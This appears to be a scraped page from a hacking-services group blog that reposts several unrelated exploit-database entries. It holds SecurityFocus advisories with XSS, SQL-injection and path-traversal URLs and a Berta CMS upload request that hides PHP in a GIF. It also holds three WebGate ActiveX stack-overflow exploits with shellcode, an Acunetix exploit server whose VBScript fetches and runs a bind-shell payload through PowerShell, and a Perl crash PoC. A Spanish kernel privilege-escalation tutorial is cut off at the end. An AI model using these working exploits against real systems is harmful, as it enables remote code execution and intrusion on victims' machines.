source: https://www.securityfocus.com/bid/51337/info
SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible.
AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*
http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction=
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119407
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/51317/info
Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/gallery_e.php?id=118+order+by+10--
Berta CMS is a web based content management system using PHP and local file storage.
http://www.berta.me/
Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.
We found that the file upload didn't require authentication.
Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.
It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>
We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.
The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26
The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files.
This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).
The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.
POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php
GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64
ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹
Ps c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðöa[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$
¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v
3jy'ž„šÉç£/øY …B
h¤œ^ž f<‹’FP‹(n %¤¤² )›q
*{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦kÒ¥`ž‚
k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
`ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v« £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’køá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°<
éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ;
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------2147563051636691175750543802--
Simon Waters
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com
http://darshanams.blogspot.com
# Exploit Title: WebGate eDVR Manager SiteName Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: eDVR Manager 2.6.4
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2098
WebGate eDVR Manager WESPPlayback.WESPPlaybackCtrl.1 SiteName Property Stack Buffer Overflow Remote Code Execution Vulnerability
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Property Let SiteName ( ByVal SiteSerialNumber As String ) As String"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='sname'>
</object>
<script>
var buff1= "";
var buff2= "PraveenD";
var nops = "";
for (i=0; i<128; i++)
{
buff1 += "B";
}
var nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(8000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
sname.SiteName(fbuff) = buff2;
</script>
</html>
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>
</object>
<script>
var buff1 = "";
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";
for (i=0;i<24; i++)
{
buff1 += "B";
}
// jump over seh to shellcode
nseh = "\xeb\x08PD";
// pop pop ret
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);
</script>
</html>
<html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
# Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day)
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Date: 27th March, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
# Version: WinRDS 2.0.8
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2094
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>
var buff1 = "";
var nops = "";
var buff2 = "";
for (i=0;i<128; i++)
{
buff1 += "B";
}
nseh = "\xeb\x08PD";
//pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);
</script>
</html>
#!/usr/bin/python
import BaseHTTPServer, sys, socket
##
# Acunetix OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
# Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
# Target Login Sequence
# Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
# This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
# Metasploit windows/shell_bind_tcp Executable Payload
# And Finally You Can Connect To Victim Machine Using Netcat
# Usage:
# chmod +x acunetix.py
# ./acunetix.py
# Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
# nc 192.168.1.7 333
# Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
#
# Video: https://vid.me/SRCb
##
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(req):
req.send_response(200)
if req.path == "/acunetix.exe":
req.send_header('Content-type', 'application/exe')
req.end_headers()
exe = open("acunetix.exe", 'rb')
req.wfile.write(exe.read())
exe.close()
else:
req.send_header('Content-type', 'text/html')
req.end_headers()
req.wfile.write("""Please scan me!
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>""")
if __name__ == '__main__':
sclass = BaseHTTPServer.HTTPServer
server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
print "Http server started", socket.gethostbyname(socket.gethostname()), 80
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
source: https://www.securityfocus.com/bid/51316/info
DIGIT CMS is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DIGIT CMS 1.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/Default.asp?sType=0&PageId=[Sqli]
source: https://www.securityfocus.com/bid/51312/info
IPtools is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer.
Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected device. Failed exploit attempts will result in a denial-of-service condition.
IPtools 0.1.4 is vulnerable; other versions may also be affected.
Title: IpTools(Tiny TCP/IP server) - Rcmd Remote Overflow Vulnerability
Software : IpTools(Tiny TCP/IP server)
Software Version : 0.1.4
Vendor: http://iptools.sourceforge.net/iptools.html
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: 2012-01-07
Updated:
Impact : High
Bug Description :
IPtools is a set of small tiny TCP/IP programs includes Remote command server(not a telnet server, Executable file: Rcmd.bat), etc.
And the remote command server would bind tcp port 23, but it does not validate the command input size leading to a Denial Of Service
flaw while sending more than 255 characters to it.
POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
#IpTools(0.1.4) - Rcmd Remote Crash PoC by demonalex (at) 163 (dot) com [email concealed]
#-------------------------------------------------------------
use IO::Socket;
$remote_host = '127.0.0.1'; #victim ip as your wish
$remote_port = 23; #rcmd default port number
$sock = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port,
Timeout => 60) || die "$remote_host -> $remote_port is closed!\n";
$sock->recv($content, 1000, 0);
$count=0;
while($count<=255){
$sock->send("a", 0);
$count++;
}
$sock->send("\r\n", 0);
$sock->recv($content, 1000, 0);
$sock->shutdown(2);
exit(1);
#-------------------------------------------------------------
Credits : This vulnerability was discovered by demonalex (at) 163 (dot) com [email concealed]
mail: demonalex (at) 163 (dot) com [email concealed] / ChaoYi.Huang (at) connect.polyu (dot) hk [email concealed]
Pentester/Researcher
Dark2S Security Team/PolyU.HK
source: https://www.securityfocus.com/bid/51311/info
IpTools Tiny TCP/IP servers is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
IpTools Tiny TCP/IP servers 0.1.4 is vulnerable; other versions may also be affected.
http://www.example.com/..\..\boot.ini
http://www.example.com/../../boot.ini
http://www.example.com/..\..\windows\system32\drivers\etc\hosts
http://www.example.com/../../windows/system32/drivers/etc/hosts
source: https://www.securityfocus.com/bid/51302/info
eFront is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Successfully exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
eFront 3.6.10 is vulnerable; other versions may also be affected.
http://www.example.com/student.php?ctg=personal&user=trainee&op=files&download=[file]
El kernel al ser el núcleo de cualquier sistema operativo, y la capa entre el hardware y software. Una explotación de este, deriva en que todo es ejecutado por el usuario SYSTEM (el usuario con mayor privilegios de todos en sistemas Windows).
El proceso para encontrar vulnerabilidades de kernel y explotarlas es aproximadamente el siguiente:
- Enumeramos la versión y parches de Windows –>
systeminfo - Buscamos exploits asociados a esa versión o parches
- Compilamos y ejecutamos –> No hace falta compilar si nos descargamos ya un exploit compilado
Hay que tener cuidado con los exploits de kernel, ya que suelen ser inestables, de un solo uso o que cause un crasheo del sistema. Por eso esta debe ser una de las últimas opciones para escalar privilegios.
Hay distintas herramientas que nos pueden ayudar a identificar este tipo de vulnerabilidades:
- Windows Exploit Suggester Next Generation
- Watson
- En metasploit: windows/gather/enum_patches
- Internet
Una vez enumerado que tipos de parches faltan o que vulnerabilidad afectan, podemos hacer uso de SecWiki, es un recurso que contiene una gran cantidad de exploits de kernel ya compilados.
Dicho esto, vamos con un caso práctico usando «Windows Exploit Suggester Next Generation»:
Lo primero de todo es obtener el systeminfo, esto incluye pasarlo a nuestra máquina Kali. Esta parte es sencilla, ya que lo podemos hacer en un solo paso. En nuestro Linux (en mi caso, kali) nos ejecutamos un servidor samba:
